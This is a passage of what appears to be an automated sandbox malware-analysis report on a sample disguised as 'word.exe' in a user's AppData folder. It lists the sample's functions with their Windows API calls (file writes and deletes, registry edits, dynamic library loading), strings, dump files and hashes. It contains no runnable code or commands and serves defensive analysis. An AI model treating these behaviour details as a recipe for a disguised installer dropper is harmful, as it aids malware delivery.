                                          • GlobalAlloc.KERNEL32(00000040,0000EA00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                          • GlobalFree.KERNEL32(?), ref: 00402758
                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                          • GlobalFree.KERNEL32(00000000), ref: 00402771
                                          • CloseHandle.KERNEL32(?), ref: 00402789
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                          • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                          • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                          • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E84 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                          • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                          • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                          • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                          • SendMessageA.USER32 ref: 00404F18
                                          • SendMessageA.USER32 ref: 00404F32
                                          • SendMessageA.USER32 ref: 00404F40
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                          • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                          • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                          • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404753 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                          • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                          • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                          • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402B6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                          • MulDiv.KERNEL32 ref: 00402BB4
                                          • wsprintfA.USER32 ref: 00402BC4
                                          • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                          Strings
                                          • verifying installer: %d%%, xrefs: 00402BBE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                          • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                          • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                          • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402A69 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                          • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                          • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                          • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                          • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                          • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                          • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                          • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404649 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                          • wsprintfA.USER32 ref: 004046EF
                                          • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                          • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                          • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                          • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                          • SendMessageA.USER32 ref: 00401C42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                          • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                          • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                          • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004038B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowTextA.USER32(00000000,nrdosueajqjitn Setup), ref: 0040394C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: 1033$C:\Users\user\AppData\Roaming\word.exe$nrdosueajqjitn Setup
                                          • API String ID: 530164218-1150146568
                                          • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                          • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                          • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                          • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040568B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                          • CharPrevA.USER32(?,00000000), ref: 0040569A
                                          • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-4017390910
                                          • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                          • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                          • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                          • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401F84 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2987980305-0
                                          • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                          • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                          • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                          • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402336 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?), ref: 00402374
                                          • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000), ref: 004023CD
                                          • RegCloseKey.ADVAPI32(?), ref: 004024B0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID:
                                          • API String ID: 1356686001-0
                                          • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                          • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                          • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                          • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040571F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextA.USER32(004054D1), ref: 0040572D
                                          • CharNextA.USER32(00000000), ref: 00405732
                                          • CharNextA.USER32(00000000), ref: 00405741
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: C:\
                                          • API String ID: 3213498283-3404278061
                                          • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                          • Instruction ID: 9935135ffb9a6864428372be34cefbf1708860cc48cffe50814e8a96023de109
                                          • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                          • Instruction Fuzzy Hash: 99F0A761904B21D6EB2272744C84B6B579CDB55720F180437E100B71D197BC4C82AF9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D38 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
